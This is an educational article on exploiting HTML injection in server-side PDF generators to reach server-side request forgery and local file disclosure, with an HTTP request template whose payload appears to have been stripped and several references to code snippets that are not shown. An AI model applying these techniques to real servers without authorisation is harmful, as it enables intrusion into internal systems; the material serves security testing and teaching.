A complete guide to finding SSRF vulnerabilities in PDF generators

PDF generators are commonly implemented in applications. Developers tend to use these components to generate documents based on dynamic data provided from the database for example. Unfortunately, not every developer is also aware of the potential risks that he/she might introduce when integrating this functionality.

In this article, we will dive deep into the implications of processing unsanitized user-controllable input in PDF generators, how we can exploit these features and escalate our initial findings for more impact.

Let’s dive in!

PDF generators are a component within a web application that allows the creation of PDF documents based on dynamic data retrieved from parameters, database contents or other data sources. PDF generators have lots of applications, from receipt and invoice generation to report and certificate issuing.

Developers often resort to using popular (open-source) libraries and third-party services to generate dynamic PDF documents. These libraries make use of several methods to generate dynamic PDF documents.

Let’s explore the 3 common ways your target may generate a PDF export for you.

HTML to PDF (most common approach)

This process often involves deploying a headless web browser (such as Chromium), rendering the HTML template with dynamic data and calling a browser API to generate the PDF document. This entire document-generating process often takes place on the server side as it takes time to create PDF file exports.

If user-controllable input is directly concatenated to the HTML template, without proper sanitization, it may be susceptible to HTML injection which in most cases can be further escalated to server-side request forgery (SSRF), local file disclosure (LFD) and other vulnerability types.

Template-based generation

Some libraries rely on pre-structured templates defined in a specific template language. Dynamic data is later on mapped to the template fields before the final document is rendered and exported.

Just as with the previous method, if user-controllable input is directly concatenated to the template, it may be susceptible to injection attacks that result in a wide range of vulnerabilities, from simple content injection to code injections and remote code execution.

TIP! CVE-2023-33733 is a perfect example demonstrating how it is possible to escalate your injection issue into a code injection vulnerability!

Third-party service

Some applications make use of external services. This process often relies on sending the dynamic data to the third-party API and receiving the PDF file in the API response. Third-party services offering managed PDF generation are often less susceptible to injection attacks.

This method is less commonly used as this approach does not always guarantee privacy, especially when sending sensitive data (such as invoices and receipts).

In this article, we will mainly cover the first and the most common PDF-generating method.

PDF generators are commonly used in web applications to generate dynamic documents such as:

Reports (for example, analytics reports or any other report types)
Receipts & invoices (especially in e-commerce targets)
Account archives
Bank account statements
Certificates (more prevalent in education & training platforms)

Example of PDF generation feature

Let’s now take a detailed look at how to exploit PDF generators to achieve server-side request forgery and further escalate our initial findings!

PDF generating can take time and for this reason also often happens asynchronously (more on this later) and on the server side. When user-controllable data is processed in an unsafe way and directly concatenated into an HTML template, it may be possible to inject HTML or arbitrary JavaScript code.

Let’s take a look at a few examples.

Exploiting full SSRF vulnerabilities

Take a look at the following code snippet below:

The API endpoint takes in the invoiceData body parameter and renders the user-controllable HTML without proper sanitization. This means that we can render arbitrary HTML tags, including script tags, allowing JavaScript to be executed on the server side.

With this information, we can craft a payload to render the response of any resource on behalf of the target server. Sending the following request, for example, would allow us to retrieve a PDF file with the rendered response:

POST /api/invoice/export HTTP/2
Host: app.example.com
Content-Type: application/json
Content-Length: 106

{
    "invoiceData": ""
}

Example of a rendered PDF file

Unfortunately, the iframe tag won’t work in all cases. Some targets already have deployed active measures against injection attacks such as XSS. In case your script tag got blocked, try one of the following payloads instead to request external content on behalf of your target:

Exploiting blind SSRF vulnerabilities

In some cases, full SSRF won’t be possible due to aggressive XSS filters for example. In this case, we can still attempt to request external resources on behalf of the server by injecting a blind XSS payload: